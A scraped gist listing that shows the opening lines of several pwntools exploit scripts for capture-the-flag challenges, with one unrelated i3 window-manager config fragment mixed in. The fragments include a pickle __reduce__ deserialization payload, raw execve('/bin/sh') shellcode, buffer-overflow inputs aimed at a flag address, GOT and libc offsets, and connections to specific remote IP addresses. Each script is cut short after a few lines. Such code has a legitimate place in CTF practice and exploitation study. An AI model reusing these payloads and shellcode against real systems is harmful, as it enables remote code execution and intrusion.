This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
import urllib2 | |
import pickle | |
class Payload(object): | |
def __reduce__(self): | |
comm = "sys.stderr.write(__import__('__main__').flag.flag)" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import p64, remote | |
from time import sleep | |
from struct import unpack | |
main_without_push_addr = 0x4004ee | |
p = remote('136.243.194.41', 666) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import p32, process, remote | |
# p = process('./note') | |
p = remote('0', 9019) | |
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90' | |
print '[*] Receiving welcome message...' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import p64, remote | |
p = remote('115.28.27.103', 22222) | |
flag_addr = 0x6010c0 | |
p.sendline('ZCTF{' + '\x01'*29 + '\x00'*262 + p64(flag_addr+5)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import p64, ELF, process, remote | |
from struct import unpack | |
from time import sleep | |
# p = process('./note1') | |
p = remote('115.28.27.103', 9001) | |
elf = ELF('./libc-2.19.so') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import p64, u64, process, ELF | |
elf = ELF('/lib64/libc.so.6') | |
# elf = ELF('./libc-2.19.so') | |
p = process('./note3') | |
free_got = 0x602018 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import process, ELF, p64 | |
from struct import unpack | |
# elf = ELF('./libc-2.19.so') | |
elf = ELF('/lib64/libc.so.6') | |
p = process('./note2') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#....... | |
# font | |
#....... | |
#font -*-cure-medium-*-*-*-11-*-*-*-*-*-*-* | |
font pango:snap, Tamsyn, WenQuanYi Bitmap Song, FontAwesome, Unifont 8 | |
#.......... | |
# windows | |
#.......... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import u64, process, remote, shellcraft, context, asm | |
context.arch = 'amd64' | |
bss_o = 0x602098 | |
p = process('./echo2') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import process, p32, remote | |
from base64 import b64encode | |
from time import time | |
from subprocess import check_output | |
system = 0x8049187 | |
buf = 0x804B0E0 |